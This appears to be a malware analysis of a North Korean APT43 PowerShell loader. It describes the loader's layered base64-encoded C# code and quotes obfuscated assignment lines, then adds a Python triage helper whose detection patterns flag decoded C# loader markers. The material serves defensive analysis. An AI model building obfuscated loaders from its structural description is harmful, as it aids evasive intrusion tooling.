Inside the Shellcode: Dissecting North Korean APT43's Advanced PowerShell Loader
The PowerShell script analyzed in this document (shell.ps1) was recovered during an unprecedented takedown operation against North Korean APT infrastructure, in which security researchers gained access to the actual malware and operational tools used by Kimsuky/APT43. This rare opportunity allows us to analyze authentic state-sponsored malware rather than samples collected from targeted organizations.
This analysis provides insight into the advanced techniques employed by nation-state actors to evade detection and maintain persistence in high-value targets.
Overview
The PowerShell script (shell.ps1) is a sophisticated malware loader that goes beyond just containing shellcode. It employs multiple components working together to evade detection, decode payloads, and execute malicious code. This document analyzes the complete structure and components of the script, revealing the technical sophistication of the threat actors’ tooling.
Base64 Encoded C# Code
The script begins by storing multiple layers of base64-encoded data in the $app_process_delete_oxf variable:
$app_process_delete_oxf = ""
$app_process_delete_oxf += auto_process_read_xwj "…" 11
This encoded data is then decoded and stored in $random_memory_search_adk:
$random_memory_search_adk …
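As an added triage example (not code from the original analysis or from shell.ps1), the following Python helper mirrors the structure described above: it collects every quoted chunk assigned or appended to a PowerShell variable, joins and base64-decodes them, and flags variables whose decoded content looks like embedded C# source. The real decoding logic of auto_process_read_xwj is not given in this section, so plain base64 is assumed; the script fragment and the C# snippet are constructed.

```python
import base64
import binascii
import re
from typing import Optional

# Matches  $var = "..."  or  $var += helper "..." 11  (helper name and trailing
# argument are skipped loosely, mirroring the loader's assignment style).
ASSIGN_RE = re.compile(r'^\s*(\$\w+)\s*\+?=\s*(?:\w+\s+)?"([^"]*)"', re.MULTILINE)
B64_RE = re.compile(r'^[A-Za-z0-9+/=]+$')

# Decoded content containing these suggests C# source destined for in-memory
# compilation (Add-Type) rather than harmless data.
CSHARP_MARKERS = (b"using System", b"DllImport", b"Marshal.", b"public class")

def collect_chunks(script: str) -> dict:
    """Group every base64-looking quoted chunk by the variable it feeds, in order."""
    chunks = {}
    for var, text in ASSIGN_RE.findall(script):
        if text and B64_RE.match(text):
            chunks.setdefault(var, []).append(text)
    return chunks

def try_decode(blob: str) -> Optional[bytes]:
    """Base64-decode, tolerating stripped padding; None if not valid base64."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None

def find_embedded_csharp(script: str) -> dict:
    """Return {variable: [markers seen]} for variables whose joined chunks decode to C#."""
    hits = {}
    for var, parts in collect_chunks(script).items():
        decoded = try_decode("".join(parts))   # chunks are pieces of one blob
        if decoded is None:
            continue
        seen = [m.decode() for m in CSHARP_MARKERS if m in decoded]
        if seen:
            hits[var] = seen
    return hits

# Constructed sample: a benign C# stub split across two += lines, plus an
# unrelated base64 string that must not be flagged.
_CSHARP = (b"using System;\nusing System.Runtime.InteropServices;\n"
           b"public class Loader { [DllImport(\"kernel32.dll\")] "
           b"static extern uint GetTickCount(); }")
_B64 = base64.b64encode(_CSHARP).decode()
SAMPLE_SCRIPT = (
    '$app_process_delete_oxf = ""\n'
    f'$app_process_delete_oxf += auto_process_read_xwj "{_B64[:40]}" 11\n'
    f'$app_process_delete_oxf += auto_process_read_xwj "{_B64[40:]}" 11\n'
    '$greeting = "aGVsbG8="\n'
)
```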